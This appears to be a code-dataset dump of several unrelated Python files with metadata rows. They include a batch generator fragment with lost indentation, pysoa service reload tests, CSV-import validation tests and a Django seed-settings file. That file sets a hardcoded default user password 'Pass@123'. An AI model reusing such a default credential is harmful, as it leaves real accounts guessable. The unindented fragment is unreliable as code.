start_idx = 0
while True:
if not start_idx < len(test_lengths):
start_idx = 0
X = X_test[start_idx:(min(start_idx + batch_size, len(test_lengths))),
0:test_lengths[min(start_idx + batch_size, len(test_lengths)) - 1]]
Y = Y_test[start_idx:(min(start_idx + batch_size, len(test_lengths))),
0:test_lengths[min(start_idx + batch_size, len(test_lengths)) - 1], :]
W = []
for idx in range(start_idx, (min(start_idx + batch_size, len(test_lengths)))):
W.append([1 if l < test_lengths[idx] else 0 for l in
range(0, test_lengths[min(start_idx + batch_size, len(test_lengths)) - 1])])
start_idx += batch_size
yield X, Y, np.array(W)
def validation_batches_fortest_408(batchsize=100):
    '''
    Yield padded validation batches (X, Y, W) in a single pass over the test
    set (the while condition stops at the end instead of wrapping around).
    :param batchsize: number of sequences per batch
    :return: generator of (X, Y, sample-weight mask) tuples
    '''
test_lengths = [int(i) for i in FileUtility.load_list(
'datasets/test_length.txt')]
X_test = np.load('datasets/X_test_408.npy')
Y_test = np.array(
np.load('datasets/test_mat_Y.npy'))
start_idx = 0
while start_idx < len(test_lengths):
X = X_test[start_idx:(min(start_idx + batchsize, len(test_lengths))),
0:test_lengths[min(start_idx + batchsize, len(test_lengths)) - 1]]
Y = Y_test[start_idx:(min(start_idx + batchsize, len(test_lengths))),
0:test_lengths[min(start_idx + batchsize, len(test_lengths)) - 1], :]
W = []
for idx in range(start_idx, (min(start_idx + batchsize, len(test_lengths)))):
W.append([1 if l < test_lengths[idx] else 0 for l in
range(0, test_lengths[min(start_idx + batchsize, len(test_lengths)) - 1])])
start_idx += batchsize
yield X, Y, np.array(W)
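# A minimal usage sketch: the first two generators cycle forever for
# Keras-style fit loops, while validation_batches_fortest_408 makes a single
# pass. Running this assumes the datasets/ files referenced above exist.
if __name__ == "__main__":
    gen = train_batch_generator_408(batch_size=64)
    X, Y, W = next(gen)  # one length-trimmed batch plus its weight mask
    print(X.shape, Y.shape, W.shape)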
| 38.223529 | 100 | 0.61896 | 481 | 3,249 | 3.906445 | 0.114345 | 0.161788 | 0.105375 | 0.126663 | 0.862693 | 0.794572 | 0.758382 | 0.734433 | 0.732304 | 0.713677 | 0 | 0.022578 | 0.250231 | 3,249 | 84 | 101 | 38.678571 | 0.748768 | 0.025239 | 0 | 0.45 | 0 | 0 | 0.068511 | 0.068511 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.033333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 6 | 904bf72f33620fcf83e91de982459952e01f2ba1 | 53 | py | Python | test/test_import.py | Rayman/toypkg | 76f6862cdd4e923abd34d981c60cab292e7a4a29 | ["MIT"] | null | null | null | test/test_import.py | Rayman/toypkg | 76f6862cdd4e923abd34d981c60cab292e7a4a29 | ["MIT"] | null | null | null | test/test_import.py | Rayman/toypkg | 76f6862cdd4e923abd34d981c60cab292e7a4a29 | ["MIT"] | null | null | null |
def test_import():
import toypkg
assert True
| 13.25 | 18 | 0.679245 | 7 | 53 | 5 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.264151 | 53 | 3 | 19 | 17.666667 | 0.897436 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.666667 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 |
0 | 6 | 9092763ab41a807d06102c41f57c4af2ff30b015 | 8,792 | py | Python | tests/functional/test_yyy_forking_and_reloading.py | arareko/pysoa | a90e428558500cf692f7f6e33fd358dd2779c328 | ["Apache-2.0"] | null | null | null | tests/functional/test_yyy_forking_and_reloading.py | arareko/pysoa | a90e428558500cf692f7f6e33fd358dd2779c328 | ["Apache-2.0"] | null | null | null | tests/functional/test_yyy_forking_and_reloading.py | arareko/pysoa | a90e428558500cf692f7f6e33fd358dd2779c328 | ["Apache-2.0"] | 1 | 2020-02-21T07:17:48.000Z | 2020-02-21T07:17:48.000Z |
from __future__ import (
absolute_import,
unicode_literals,
)
import time
import pytest
from pysoa.common.constants import ERROR_CODE_ACTION_TIMEOUT
from pysoa.common.transport.errors import MessageReceiveTimeout
from tests.functional import (
get_container_logs,
get_container_process_list,
read_file_from_container,
write_file_to_container,
)
def test_double_import_trap_killed_intended_service():
with pytest.raises(AssertionError) as error_context:
read_file_from_container('echo_service_double_import_trap', '/srv/echo_service-1.heartbeat')
assert 'No container found for echo_service_double_import_trap_1' in error_context.value.args[0]
assert 'ERROR: You have triggered a double-import trap' in get_container_logs('echo_service_double_import_trap')
def test_heartbeat_file_watching_no_forking(pysoa_client):
original_ts = float(read_file_from_container('meta_service', '/srv/meta_service-{{fid}}.heartbeat'))
assert original_ts > 0
time.sleep(2.5)
response = pysoa_client.call_action('meta', 'status')
assert response.body['version'] == '2.1.7'
new_ts = float(read_file_from_container('meta_service', '/srv/meta_service-{{fid}}.heartbeat'))
assert new_ts > original_ts
def test_heartbeat_file_forking_no_watching(pysoa_client):
original_ts_1 = float(read_file_from_container('user_service', '/srv/user_service-1.heartbeat'))
original_ts_2 = float(read_file_from_container('user_service', '/srv/user_service-2.heartbeat'))
original_ts_3 = float(read_file_from_container('user_service', '/srv/user_service-3.heartbeat'))
original_ts_4 = float(read_file_from_container('user_service', '/srv/user_service-4.heartbeat'))
assert original_ts_1 > 0
assert original_ts_2 > 0
assert original_ts_3 > 0
assert original_ts_4 > 0
time.sleep(2.5)
responses = pysoa_client.call_actions_parallel(
'user',
[
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
],
)
for response in responses:
assert response.body['version'] == '1.0.17'
new_ts_1 = float(read_file_from_container('user_service', '/srv/user_service-1.heartbeat'))
new_ts_2 = float(read_file_from_container('user_service', '/srv/user_service-2.heartbeat'))
new_ts_3 = float(read_file_from_container('user_service', '/srv/user_service-3.heartbeat'))
new_ts_4 = float(read_file_from_container('user_service', '/srv/user_service-4.heartbeat'))
assert new_ts_1 > original_ts_1
assert new_ts_2 > original_ts_2
assert new_ts_3 > original_ts_3
assert new_ts_4 > original_ts_4
def test_heartbeat_file_forking_and_watching(pysoa_client):
original_ts_1 = float(read_file_from_container('echo_service', '/srv/echo_service-1.heartbeat'))
original_ts_2 = float(read_file_from_container('echo_service', '/srv/echo_service-2.heartbeat'))
original_ts_3 = float(read_file_from_container('echo_service', '/srv/echo_service-3.heartbeat'))
assert original_ts_1 > 0
assert original_ts_2 > 0
assert original_ts_3 > 0
time.sleep(2.5)
responses = pysoa_client.call_actions_parallel(
'echo',
[
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
],
)
for response in responses:
assert response.body['version'] == '9.5.3'
new_ts_1 = float(read_file_from_container('echo_service', '/srv/echo_service-1.heartbeat'))
new_ts_2 = float(read_file_from_container('echo_service', '/srv/echo_service-2.heartbeat'))
new_ts_3 = float(read_file_from_container('echo_service', '/srv/echo_service-3.heartbeat'))
assert new_ts_1 > original_ts_1
assert new_ts_2 > original_ts_2
assert new_ts_3 > original_ts_3
def test_reload_no_forking(pysoa_client):
print(get_container_process_list('meta_service'))
assert read_file_from_container('meta_service', '/srv/meta/meta_service/version.py') == "__version__ = '2.1.7'"
write_file_to_container('meta_service', '/srv/meta/meta_service/version.py', "__version__ = '7.1.2'")
assert read_file_from_container('meta_service', '/srv/meta/meta_service/version.py') == "__version__ = '7.1.2'"
time.sleep(10)
print(get_container_process_list('meta_service'))
response = pysoa_client.call_action('meta', 'status')
assert response.body['version'] == '7.1.2'
def test_reload_with_forking(pysoa_client):
print(get_container_process_list('echo_service'))
assert read_file_from_container('echo_service', '/srv/echo/echo_service/version.py') == "__version__ = '9.5.3'"
write_file_to_container('echo_service', '/srv/echo/echo_service/version.py', "__version__ = '9.8.0'")
assert read_file_from_container('echo_service', '/srv/echo/echo_service/version.py') == "__version__ = '9.8.0'"
time.sleep(10)
print(get_container_process_list('echo_service'))
responses = pysoa_client.call_actions_parallel(
'echo',
[
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
],
)
for response in responses:
assert response.body['version'] == '9.8.0'
def test_no_reload_no_watcher(pysoa_client):
print(get_container_process_list('user_service'))
assert read_file_from_container('user_service', '/srv/user/user_service/version.py') == "__version__ = '1.0.17'"
write_file_to_container('user_service', '/srv/user/user_service/version.py', "__version__ = '1.2.1'")
assert read_file_from_container('user_service', '/srv/user/user_service/version.py') == "__version__ = '1.2.1'"
time.sleep(10)
print(get_container_process_list('user_service'))
responses = pysoa_client.call_actions_parallel(
'user',
[
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
{'action': 'status'}, {'action': 'status'}, {'action': 'status'}, {'action': 'status'},
],
)
for response in responses:
assert response.body['version'] == '1.0.17'
def test_harakiri_graceful_restart(pysoa_client):
original_ts_1 = float(read_file_from_container('echo_service', '/srv/echo_service-1.heartbeat'))
original_ts_2 = float(read_file_from_container('echo_service', '/srv/echo_service-2.heartbeat'))
original_ts_3 = float(read_file_from_container('echo_service', '/srv/echo_service-3.heartbeat'))
assert original_ts_1 > 0
assert original_ts_2 > 0
assert original_ts_3 > 0
print(get_container_process_list('echo_service'))
with pytest.raises(pysoa_client.CallActionError) as error_context:
pysoa_client.call_action('echo', 'harakiri_loop_graceful', timeout=12)
assert len(error_context.value.actions) == 1
assert len(error_context.value.actions[0].errors) == 1
assert error_context.value.actions[0].errors[0].code == ERROR_CODE_ACTION_TIMEOUT
print(get_container_process_list('echo_service'))
new_ts_1 = float(read_file_from_container('echo_service', '/srv/echo_service-1.heartbeat'))
new_ts_2 = float(read_file_from_container('echo_service', '/srv/echo_service-2.heartbeat'))
new_ts_3 = float(read_file_from_container('echo_service', '/srv/echo_service-3.heartbeat'))
assert new_ts_1 > original_ts_1
assert new_ts_2 > original_ts_2
assert new_ts_3 > original_ts_3
def test_harakiri_forceful_restart(pysoa_client):
original_ts_1 = float(read_file_from_container('echo_service', '/srv/echo_service-1.heartbeat'))
original_ts_2 = float(read_file_from_container('echo_service', '/srv/echo_service-2.heartbeat'))
original_ts_3 = float(read_file_from_container('echo_service', '/srv/echo_service-3.heartbeat'))
assert original_ts_1 > 0
assert original_ts_2 > 0
assert original_ts_3 > 0
print(get_container_process_list('echo_service'))
with pytest.raises(MessageReceiveTimeout):
pysoa_client.call_action('echo', 'harakiri_loop_forceful', timeout=12)
print(get_container_process_list('echo_service'))
new_ts_1 = float(read_file_from_container('echo_service', '/srv/echo_service-1.heartbeat'))
new_ts_2 = float(read_file_from_container('echo_service', '/srv/echo_service-2.heartbeat'))
new_ts_3 = float(read_file_from_container('echo_service', '/srv/echo_service-3.heartbeat'))
assert new_ts_1 > original_ts_1
assert new_ts_2 > original_ts_2
assert new_ts_3 > original_ts_3
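# The heartbeat assertions above imply that every server process periodically
# rewrites /srv/<service>-<fork id>.heartbeat with a fresh POSIX timestamp.
# A minimal sketch of such a writer loop, purely to illustrate what the tests
# observe; the real pysoa servers implement this internally:
def heartbeat_writer_sketch(path, interval=1.0, beats=5):
    """Write the current timestamp to `path` every `interval` seconds."""
    for _ in range(beats):
        with open(path, 'w') as f:
            f.write(str(time.time()))
        time.sleep(interval)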
| 42.47343 | 116 | 0.718039 | 1,223 | 8,792 | 4.741619 | 0.080131 | 0.098638 | 0.074496 | 0.130367 | 0.846525 | 0.818934 | 0.795482 | 0.764615 | 0.728057 | 0.728057 | 0 | 0.023544 | 0.144904 | 8,792 | 206 | 117 | 42.679612 | 0.747805 | 0 | 0 | 0.554839 | 0 | 0 | 0.297316 | 0.146611 | 0 | 0 | 0 | 0 | 0.296774 | 1 | 0.058065 | false | 0 | 0.070968 | 0 | 0.129032 | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0 | 6 | 290fb371e6a41d6496f17e9f9f6ddf955c8ffbd0 | 137 | py | Python | hcap/settings/general/seed.py | fabiommendes/capacidade_hospitalar | 4f675b574573eb3f51e6be8a927ea230bf2712c7 | ["MIT"] | null | null | null | hcap/settings/general/seed.py | fabiommendes/capacidade_hospitalar | 4f675b574573eb3f51e6be8a927ea230bf2712c7 | ["MIT"] | 31 | 2020-04-11T13:38:17.000Z | 2021-09-22T18:51:11.000Z | hcap/settings/general/seed.py | fabiommendes/capacidade_hospitalar | 4f675b574573eb3f51e6be8a927ea230bf2712c7 | ["MIT"] | 1 | 2020-04-08T17:04:39.000Z | 2020-04-08T17:04:39.000Z |
from hcap.settings.env import env
# Used by user seed commands
SEED_DEFAULT_PASSWORD = env("SEED_DEFAULT_PASSWORD", default="Pass@123")
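# A hedged sketch of how a seed command might consume this setting; the
# helper name and user-model wiring are assumptions for illustration only:
#
# from django.contrib.auth import get_user_model
#
# def seed_user(username):
#     """Create a throwaway user with the shared development password."""
#     return get_user_model().objects.create_user(
#         username, password=SEED_DEFAULT_PASSWORD)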
| 27.4 | 72 | 0.79562 | 21 | 137 | 5 | 0.666667 | 0.209524 | 0.361905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02459 | 0.109489 | 137 | 4 | 73 | 34.25 | 0.836066 | 0.189781 | 0 | 0 | 0 | 0 | 0.266055 | 0.192661 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.5 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 |
0 | 6 | 2973e94847ea74f19a48097bd62bd29dec3524a4 | 91 | py | Python | 7_Modules/Package1/Package1_1/ModuleTest.py | Oscar-Oliveira/Python3 | fa791225a6810b75890d24407b73c5e1b514acbe | ["MIT"] | null | null | null | 7_Modules/Package1/Package1_1/ModuleTest.py | Oscar-Oliveira/Python3 | fa791225a6810b75890d24407b73c5e1b514acbe | ["MIT"] | null | null | null | 7_Modules/Package1/Package1_1/ModuleTest.py | Oscar-Oliveira/Python3 | fa791225a6810b75890d24407b73c5e1b514acbe | ["MIT"] | null | null | null |
"""
Module
"""
def my_multiplier(value1, value2):
return value1 * value2 * 1000
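# A quick usage example: the helper scales the product by 1000, so
# my_multiplier(2, 3) evaluates to 2 * 3 * 1000 == 6000.
if __name__ == "__main__":
    assert my_multiplier(2, 3) == 6000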
| 13 | 35 | 0.615385 | 10 | 91 | 5.5 | 0.8 | 0.436364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 0.252747 | 91 | 6 | 36 | 15.166667 | 0.691176 | 0.065934 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 |
0 | 6 | 462406933a0df9e604be174a72c14431607962b5 | 22,485 | py | Python | django_project/src/imports/processing/tests.py | icrc-fdeniger/waterboard | 10d95b15938b495f4c83c6e125cbb6a2ba41e506 | ["MIT"] | 1 | 2019-01-19T09:01:48.000Z | 2019-01-19T09:01:48.000Z | django_project/src/imports/processing/tests.py | icrc-fdeniger/waterboard | 10d95b15938b495f4c83c6e125cbb6a2ba41e506 | ["MIT"] | 32 | 2017-12-15T14:35:17.000Z | 2022-03-11T23:16:10.000Z | django_project/src/imports/processing/tests.py | icrc-fdeniger/waterboard | 10d95b15938b495f4c83c6e125cbb6a2ba41e506 | ["MIT"] | 4 | 2019-02-13T07:52:05.000Z | 2021-04-29T08:20:58.000Z |
# -*- coding: utf-8 -*-
import unittest
from .errors import FileError, MultipleUuidError, NoRequiredColumnError, UnnamedColumnError
from .functions import check_data, check_file_header, check_headers, for_insert, for_update, parse_data_file
class TestCSVImport(unittest.TestCase):
def test_checkFileHeader_emptyFile(self):
data_raw = []
self.assertRaises(FileError, check_file_header, data_raw)
def test_checkFileHeader_emptyFirstRow(self):
data_raw = [[None, None, None], ['1', '2', '3']]
self.assertRaises(FileError, check_file_header, data_raw)
def test_checkFileHeader_columnsWithoutName(self):
data_raw = [['a', None, 'b'], ['1', '2', '3']]
self.assertRaises(UnnamedColumnError, check_file_header, data_raw)
def test_getDataFile_checkNew(self):
data_raw = [
['feature_uuid', 'a', 'b'],
['uuid1', 'x', 'y'],
['', 'xy', 'yz'],
['', 'ab', 'bc'],
['', '', ''],
[None, '', ''],
['uuid2', 'x', 'y']
]
expected_result = (
['feature_uuid', 'a', 'b'], {
'uuid1': {'feature_uuid': 'uuid1', 'a': 'x', 'b': 'y'},
'uuid2': {'feature_uuid': 'uuid2', 'a': 'x', 'b': 'y'},
'new_feature_uuid_1': {'feature_uuid': 'new_feature_uuid_1', 'a': 'xy', 'b': 'yz'},
'new_feature_uuid_2': {'feature_uuid': 'new_feature_uuid_2', 'a': 'ab', 'b': 'bc'},
'new_feature_uuid_3': {'feature_uuid': 'new_feature_uuid_3', 'a': None, 'b': None},
'new_feature_uuid_4': {'feature_uuid': 'new_feature_uuid_4', 'a': None, 'b': None}
}
)
self.assertEqual(parse_data_file(data_raw), expected_result)
def test_getDataFile_multipleUuid(self):
data_raw = [['feature_uuid', 'a', 'b'], ['uuid1', 'x', 'y'], ['uuid1', 'xy', 'yz'], ['uuid2', 'x', 'y']]
self.assertRaises(MultipleUuidError, parse_data_file, data_raw)
def test_getDataFile_ignoredAttributes(self):
data_raw = [['feature_uuid', 'a', 'email', 'changeset'], ['uuid1', 'x', 'y', 1], ['uuid2', 'x', 'y', 2]]
expected_result = (['feature_uuid', 'a'], {
'uuid1': {'feature_uuid': 'uuid1', 'a': 'x', 'changeset': 1},
'uuid2': {'feature_uuid': 'uuid2', 'a': 'x', 'changeset': 2}
})
self.assertEqual(parse_data_file(data_raw), expected_result)
def test_check_headers_areSame(self):
header_file = ['col1', 'col2', 'col3']
header_db = ['col1', 'col3', 'col2']
attributes = {'col1': {'required': False}, 'col2': {'required': False}, 'col3': {'required': True}}
self.assertEqual(check_headers(header_file, header_db, attributes), [])
def test_check_headers_moreInFile(self):
header_file = ['col1', 'col2', 'col3', 'col4', 'col5']
header_db = ['col1', 'col3', 'col2']
attributes = {'col1': {'required': False}, 'col2': {'required': False}, 'col3': {'required': True}}
self.assertEqual(check_headers(header_file, header_db, attributes), [
'Column "col4" in uploaded file is not defined in database. Data will be inserted in database without '
'values in column "col4".',
'Column "col5" in uploaded file is not defined in database. Data will be inserted in database without '
'values in column "col5".'])
def test_check_headers_lessInFile_notRequired(self):
header_file = ['col1', 'col2', 'col3']
header_db = ['col1', 'col3', 'col2', 'col4']
attributes = {'col1': {'required': False}, 'col2': {'required': False}, 'col3': {'required': True}}
self.assertEqual(check_headers(header_file, header_db, attributes), [])
def test_check_headers_lessInFile_required_one(self):
header_file = ['col1', 'col2']
header_db = ['col1', 'col3', 'col2', 'col4']
attributes = {'col1': {'required': False}, 'col2': {'required': False}, 'col3': {'required': True}}
self.assertRaises(NoRequiredColumnError, check_headers, header_file, header_db, attributes)
def test_check_headers_lessInFile_required_two(self):
header_file = ['col1']
header_db = ['col1', 'col3', 'col2', 'col4']
attributes = {'col1': {'required': False}, 'col2': {'required': True}, 'col3': {'required': True}}
self.assertRaises(NoRequiredColumnError, check_headers, header_file, header_db, attributes)
def test_check_headers_lessInFile_required_three(self):
header_file = ['col1']
header_db = ['col1', 'col3', 'col2', 'col4']
attributes = {'col1': {'required': False}, 'col2': {'required': True}, 'col3': {'required': True},
'col4': {'required': True}}
self.assertRaises(NoRequiredColumnError, check_headers, header_file, header_db, attributes)
def test_for_update_sameRows(self):
row_file = {'a': '123', 'b': 123, 'c': 'abc'}
row_db = {'a': '123', 'b': 123, 'c': 'abc'}
self.assertFalse(for_update(row_file, row_db))
def test_for_update_differentRows(self):
row_file = {'a': '123', 'b': 123, 'c': 'ab'}
row_db = {'a': '123', 'b': 123, 'c': 'abc'}
self.assertTrue(for_update(row_file, row_db))
def test_for_update_moreRowsInFile(self):
row_file = {'a': '123', 'b': 123, 'c': 'abc', 'd': 'abc'}
row_db = {'a': '123', 'b': 123, 'c': 'abc'}
self.assertFalse(for_update(row_file, row_db))
def test_for_update_moreRowsInDB(self):
row_file = {'a': '123', 'b': 123, 'c': 'abc'}
row_db = {'a': '123', 'b': 123, 'c': 'abc', 'd': 'abc'}
self.assertFalse(for_update(row_file, row_db))
def test_for_insert_inDropdown(self):
index_row = 3
row = {'a': 'abc'}
attributes = {'a': {'type': 'DropDown', 'required': False, 'id': '1', 'options': ['abc', 'Eastern']}}
self.assertEqual(for_insert(index_row, row, attributes), (True, ''))
def test_for_insert_notInDropdown(self):
index_row = 3
row = {'a': 'abc1'}
attributes = {'a': {'type': 'DropDown', 'required': False, 'id': '1', 'options': ['abc', 'Eastern']}}
self.assertEqual(
for_insert(index_row, row, attributes),
(False, 'Row 3: value in column "a" is not allowed (it should be one of the predefined values).')
)
def test_for_insert_isInteger(self):
index_row = 3
row = {'a': 1}
attributes = {'a': {'type': 'Integer', 'required': False, 'id': '1'}}
self.assertEqual(for_insert(index_row, row, attributes), (True, ''))
def test_for_insert_isNotInteger(self):
index_row = 3
row = {'a': 1.2}
attributes = {'a': {'type': 'Integer', 'required': False, 'id': '1'}}
self.assertEqual(
for_insert(index_row, row, attributes),
(False, 'Row 3: value in column "a" is not allowed (it should be a whole number).')
)
def test_for_insert_isDecimal(self):
index_row = 3
row = {'a': 1.2}
attributes = {'a': {'type': 'Decimal', 'required': False, 'id': '1'}}
self.assertEqual(for_insert(index_row, row, attributes), (True, ''))
def test_for_insert_isNotDecimal(self):
index_row = 3
row = {'a': '1.2'}
attributes = {'a': {'type': 'Decimal', 'required': False, 'id': '1'}}
self.assertEqual(
for_insert(index_row, row, attributes),
(False, 'Row 3: value in column "a" is not allowed (it should be a decimal number).')
)
def test_for_insert_required_notEmpty(self):
index_row = 3
row = {'a': 1.2}
attributes = {'a': {'type': 'Decimal', 'required': True}}
self.assertEqual(for_insert(index_row, row, attributes), (True, ''))
def test_for_insert_required_empty(self):
index_row = 3
row = {'a': None, 'b': 1}
attributes = {'a': {'type': 'Decimal', 'required': True, 'id': '1'}}
self.assertEqual(for_insert(index_row, row, attributes), (False, 'Row 3: value in column "a" is missing.'))
def test_for_insert_multipleErrors(self):
index_row = 3
row = {'a': None, 'b': 'abc', 'c': 'x'}
attributes = {'a': {'type': 'Decimal', 'required': True},
'b': {'type': 'Decimal', 'required': True},
'c': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['abc', 'Eastern']}}
expected_result = (
False, (
'Row 3: value in column "a" is missing, value in column "b" is not allowed (it should '
'be a decimal number), value in column "c" is not allowed (it should be one of the '
'predefined values).'
)
)
self.assertEqual(for_insert(index_row, row, attributes), expected_result)
def test_check_data_empty_rows(self):
data_file = {
'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57},
'new_feature_uuid_1': {'feature_uuid': 'new_feature_uuid_1', 'a': None, 'b': None},
'new_feature_uuid_2': {'feature_uuid': 'new_feature_uuid_2', 'a': None, 'c': None}
}
data_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': False, 'id': '1'},
'b': {'type': 'DropDown', 'required': False, 'id': '1', 'options': ['abc', 'Eastern']},
'c': {'type': 'Decimal', 'required': False, 'id': '1'}}
self.assertEqual(
check_data(data_file, data_db, attributes), (
[
{'a': None, 'b': None, 'feature_uuid': 'new_feature_uuid_1'},
{'a': None, 'c': None, 'feature_uuid': 'new_feature_uuid_2'}
],
[], [], [], {
'num_add': 2, 'num_discarded': 0, 'num_needs_correction': 0, 'num_unchanged': 2, 'num_update': 0
}
)
)
def test_check_data_no_change(self):
data_file = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
data_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['abc', 'Eastern']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
self.assertEqual(
check_data(data_file, data_db, attributes),
([], [], [], [], {
'num_add': 0, 'num_discarded': 0, 'num_needs_correction': 0, 'num_unchanged': 2, 'num_update': 0
})
)
def test_check_data_oneForAdd(self):
data_file = {
'453abc': {'a': 123, 'b': 'abc', 'c': 1.23}, 'new_feature_uuid_1': {'a': 98, 'b': 'abc', 'c': 1.57}
}
data_db = {'453abc': {'a': 123, 'b': 'abc', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'abc', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['abc', 'Eastern']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
self.assertEqual(
check_data(data_file, data_db, attributes), (
[{'a': 98, 'b': 'abc', 'c': 1.57}], [], [], [], {
'num_add': 1, 'num_discarded': 0, 'num_needs_correction': 0, 'num_unchanged': 1, 'num_update': 0
}
)
)
def test_check_data_oneForUpdate(self):
data_file = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.58}}
data_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
self.assertEqual(
check_data(data_file, data_db, attributes), (
[], [{'a': 98, 'b': 'cba', 'c': 1.58}], [], [], {
'num_add': 0, 'num_discarded': 0, 'num_needs_correction': 0, 'num_unchanged': 1, 'num_update': 1
}
)
)
def test_check_data_oneDiscarded(self):
data_file = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, 'AAA': {'a': 98, 'b': 'cba', 'c': 1.57}}
data_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
self.assertEqual(
check_data(data_file, data_db, attributes), (
[], [], [], ['Row 3 was discarded. (feature_uuid not in database or not blank)'],
{'num_add': 0, 'num_discarded': 1, 'num_needs_correction': 0, 'num_unchanged': 1, 'num_update': 0}
)
)
def test_check_data_oneUpdate_oneWith3Errors_oneDiscarded_oneForAdd(self):
data_file = {'453abc': {'a': 1234, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 1.2, 'b': 'abc', 'c': None},
'ABC': {'a': 98, 'b': 'xyz', 'c': 1.2}, 'new_feature_uuid_1': {'a': 98, 'b': 'cba', 'c': 1.2}}
data_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
expected_result = (
[{'a': 98, 'b': 'cba', 'c': 1.2}], [{'a': 1234, 'b': 'xyz', 'c': 1.23}], [], [
'Row 3: value in column "a" is not allowed (it should be a whole number), value in column "b" is not '
'allowed (it should be one of the predefined values), value in column "c" is missing.',
'Row 4 was discarded. (feature_uuid not in database or not blank)'
],
{'num_add': 1, 'num_discarded': 1, 'num_needs_correction': 1, 'num_unchanged': 0, 'num_update': 1}
)
self.assertEqual(check_data(data_file, data_db, attributes), expected_result)
def test_check_data_oneForAddWithError(self):
data_file = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, 'new_feature_uuid_1': {'a': 1.2, 'b': 'cba', 'c': 2}}
data_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
